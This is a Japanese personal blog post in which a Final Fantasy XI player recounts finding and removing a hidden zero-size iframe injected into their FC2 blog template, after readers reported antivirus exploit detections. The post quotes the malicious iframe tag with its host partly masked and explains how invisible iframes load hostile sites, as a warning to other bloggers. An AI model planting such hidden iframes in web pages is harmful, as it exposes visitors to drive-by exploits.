こんにちわ!
第七猫です!皆様大変ご心配をおかけしました(;^ω^)ノ
ここ数日で、2件ほどですが
「当ブログよりウイルスが検出された」とのコメントを頂き急遽では
ありますが対応をさせて貰いました。
さて、最近のFF11における事情を考え
万が一があってはイケナイと思い、ブログを一時的に
プライベートモードに設定し、原因がある程度分かるまで公開を控えておりました。
訪れてくださった多くの方にご心配をお掛けしました事、心よりお詫び申し上げます。
それにしても、
ブログからウイルス検出とはどういう事なんでしょうか?
今回の一連の流れをご説明致します。
特にFC2ブログをご利用の方、是非ご一読下さい。
?2/27に非公開コメントにて、当ブログを開いた際にウイルス検出されたとのコメントを頂きました。
?2/29に非公開コメントにて、再びウイルス検出されたとのコメント頂きました。 (2/27の方とは別の方で、詳細なスキャン結果をコメント頂いております)
以下抜擢(マカフィーで検出された結果らしいです)
----------
コンピューター上で実行されたスクリプトから項目が検出され、削除されました
検出名:Exploit-MS06-014(ウィルス)
プロセス:iexplore.exe
プロセス説明:internet explorer
----------
コンピューター上で実行されたスクリプトから項目が検出され、削除されました
検出名:Exploit-Realplay(ウィルス)
プロセス:iexplore.exe
プロセス説明:internet explorer
---------
?万が一を考え、ブログを一旦プライベートモードへ(非公開へ)
?まずは感染の原因として自PCのウイルススキャン実施。 →ウィルスバスター、トレンドフレックスオンラインスキャン等、複数のチェックにて
問題無し。
?事情をFC2へメールし、連絡、自分でも原因を調査
?FC2様よりメールにて回答あり。(以下原文抜擢)>お問合せいただきました件ですが、
>こちらで確認させて頂きましたが、今現在はその様な現象を確認できませんでした。
>状況から察する限り、ウイルス配布サイトへのURL付きコメントが行われた可能性があります。
つまり、
ウイルス配布サイトへのURL付きコメントやトラックバックが原因では?との事。
確かに?でコメント頂いた2/27には、怪しいコメントを1件削除した覚えがありました。
しかし?の2/29には、そういった類のコメントやトラックバックが付いてすら居なかった為
第七猫の中で非常に
腑に落ちない…というか、完全納得できる状況にはならなかった。
(この時?の怪しいソースも発見していた為)
?過去事例やwebの検索調査より、当ブログのテンプレートに怪しいインラインフレームを発見。過去のROさんのアカウントハック事例等から情報を得まして、当ブログのテンプレートの中に
非常に怪しげなインラインフレームを発見。
インラインフレームとは
このように本文内にフレームを作成し、その内部に
別のwebサイトを読み込ませて表示する事。
(環境や設定によっては正常に表示されない事があります。フレーム内はFF11公式ページです)
この機能非常に便利なようですが、実はとんでもない使い方ができる訳でして…
この「別のwebサイトを読み込む」というのが非常に危険(;^ω^)
なんとなく…分かりますよね?
普段コメントやトラックバックに付く、怪しいURLがもしこの別のWebサイトに指定されていたら…
そしてこのインラインフレーム、
縦横の幅を指定できるんです。
上の公式は縦:300、横:500ピクセルで表示していますが、実は縦横0ピクセルまで設定可能。
つまり
別Webサイトを読み込み、そのフレームサイズが0×0だった場合…
何も表示されないのに、怪しいURLをクリックした事と
同様の事が起こるという訳です。
((( ;゚Д゚)))ガクガクブルブル
そして今回第七猫が見つけたインラインフレームは…
↓
<iframe src=http://www■dda3■net width=0 height=0></iframe>
これは…!?こんなインラインフレーム
前からあったっけ?という感じ。
つまり
縦0×横0のフレーム内に、www■dda3■netを読みこめ。という物。
そしてこのアドレスをAguseさんでチェックしたところ…
香港付近のサーバーで、確かにちょっと嫌らしく意味不明なサイトが…
さらにはジャバスクリプトで
s111■cnzz■com というサイトへ繋がっている模様…?
これは怪しい。チェッカーではNG判定が出なかったモノの、これは第七猫からすると
非常にグレー。
?このインラインフレームを発見した事をFC2に報告し、テンプレート内の上記インラインフレーム削除
もしくは、上記アドレスの安全性の調査を依頼。 著作権や広告等の絡みもあり、テンプレートの軽はずみな修正が出来なかった為。
?休日にも関わらずFC2より返信あり。ちょっと驚く内容で以下抜擢、原文のまま−−−−−
(アドレス部分のみ修正箇所あり)
>お問い合わせいただきました件ですが、
>ただちに
><iframe src=http://www■dda3■net width=0 height=0></iframe>
>こちらのタグを削除していただくか、テンプレートを
>変更していただきます様お願いいたします。
>
>また、第三者により、テンプレートを改造されてしまった
>可能性がございます。
>パスワードを第三者に想定されないようなものに
>変更していただきます様お願いいたします。
>
>弊社側でも引き続き調査をいたします。
>ご通報ありがとうございました。
FC2からの回答はなんと、上記のタグを
ただちに削除するか、
テンプレートを
変更しろとの事!
Σ(゚д゚lll)ガーン
そしてもっと衝撃的だったのが…
「第三者により、テンプレートを改造されてしまった可能性」あくまで可能性の一つですが、確かに考えられない事も無い。
果たして
第七猫のFC2IDをハックしたのか?それとも
FC2のテンプレートを直接改竄できる
状態だったのか?詳しい事は分かりませんがどちらにしろ問題です。
?第七猫のFC2IDのパスワード変更し、テンプレートからインラインフレームを削除。 そして3/1のブログ公開へという流れです。
とりあえずは…
・感染元の主原因として考えられた自PCからのウイルス検出が無かった事
・怪しいインラインフレームの削除を指示され、それを対応済みな事
・FC2IDのパスワードを変更済みの事以上の条件が揃いましたので、ある程度の
安全性が確保されたであろうとの判断です。
FC2ブログをお持ちのブログ主様、是非一度ご自分のブログのソースを開き
<iframe で検索を掛けてみてください!意図せぬ所にインラインフレームの記述があった場合は
直ちに
FC2に連絡、もしくは内容の修正をする事をお勧め致します。
もちろん
FC2IDのパスワード変更もお忘れなく。
今回ウイルス検出とのコメント頂けたお二方、
情報ありがとうございました。
それにしても怖い世の中だぁ〜(´;ω;`)
PR
